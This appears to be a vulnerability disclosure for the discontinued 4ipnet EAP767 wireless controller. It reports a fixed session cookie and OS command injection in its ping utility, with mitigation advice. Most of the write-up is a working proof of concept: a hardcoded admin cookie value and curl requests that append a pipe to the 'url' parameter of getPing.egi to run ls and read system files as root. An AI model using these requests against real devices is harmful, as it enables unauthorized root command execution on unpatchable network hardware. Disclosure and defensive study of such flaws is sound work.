4ipnet/EAP767 WRT is vulnerable to Incorrect Access Control and OS Command Injection
EAP767 - 3.42.00
- The device is vulnerable to Incorrect Access Control. It uses the same set of credentials, regardless of how many times a user logs in, the content of the cookie remains unchanged(CWE-284).
- A OS command injection vulnerability was found within the web interface of the device(CWE-78).
- A credential fixation gives the attacker access to the victim's account. This could mean access to higher level privileges or the ability to look at sensitive data
- An attacker may inject arbitrary shell commands with valid credentials, and it be executed by the device with root privileges.
- Stop using the products and switch to alternative products
- The developer has disbanded in Oct 2020, and the firmware updates will not be provided.
- Disable internet access.
- Change default credential.
The login web page is exposed to internet, and it's used for 4ipnet wireless network controller
Search online documents to obtain the default password for the device.
Web console features
System Overview
Network Utilities
allowing network tests such as ping, tracert, arping, etc., to be performed through the web page.
Phase 1 @ Browser
The front-end performs input text validation to check whether the input text is compliant
Turn to the backend, analysis HTTP request characteristics from the network
We gather two http request characteristics.
# request 1
http://{host}/getPing.egi?url=127.0.0.1
# request 2
http://{host}/getPing.egi?pid=940
It can be observed that its ping function first sends the url as a query string parameter, obtains the pid, then retrieves ping output in batches through the pid parameter, and finally presents the results on the web page
It was found that the management interface relies solely on the cookie name/value as the basis for user identification
Using the same set of credentials (admin), regardless of how many times you log in, the content of the cookie remains unchanged.
| Name | Value |
|---|---|
| username | admin |
| password | 17lgP6vqCV1Ko |
Phase 2 @ cmd
Using the curl tool to simulate an HTTP request to access the management interface home page, it was redirected to the login page
Using the curl tool to simulate an HTTP request and including the aforementioned obtained cookie, it was confirmed that access to the authenticated management interface home page is possible
Attempted to access the getPing.egi file and escape the query string parameter url using special characters (;, |) in an attempt to evade security and inject a specified command
Attemp 1 with ;
Detected as invalid characters by the backend program.
❯ curl -i -b "username=admin; password=17lgP6vqCV1Ko" "http://{host}/getPing.egi?url=127.0.0.1;"
HTTP/1.1 200 OK
Date: Mon, 15 Jan 2024 01:49:25 GMT
Server: Mbedthis-Appweb/2.4.2
Cache-Control: no-cache
Content-type: text/html
Content-length: 29
Connection: keep-alive
Keep-Alive: timeout=60, max=100
Illegal Characters of URL.
OK%
Attemp 2 with |
Successful escape!!! and obtained pid!!!
❯ curl -i -b "username=admin; password=17lgP6vqCV1Ko" "http://{host}/getPing.egi?url=127.0.0.1|"
HTTP/1.1 200 OK
Date: Mon, 15 Jan 2024 01:52:49 GMT
Server: Mbedthis-Appweb/2.4.2
Cache-Control: no-cache
Content-type: text/html
Content-length: 4
Connection: keep-alive
Keep-Alive: timeout=60, max=100
3704%
Inject Target with ls to list the current directory.
curl -i -b "username=admin; password=17lgP6vqCV1Ko" "http://{host}/getPing.egi?url=|ls"
Inject Target with ls -l to display the current directory structure, file permissions, file types, modification dates, and other information."
curl -i -b "username=admin; password=17lgP6vqCV1Ko" "http://{host}/getPing.egi?url=|ls%20-l"
curl -b "username=admin; password=17lgP6vqCV1Ko" "{host}/getPing.egi?url=|cat%20/etc/product.info"
The presence of a Remote Code Execution (RCE) vulnerability is in the product. Arbitrary commands can be executed by passing the url parameter.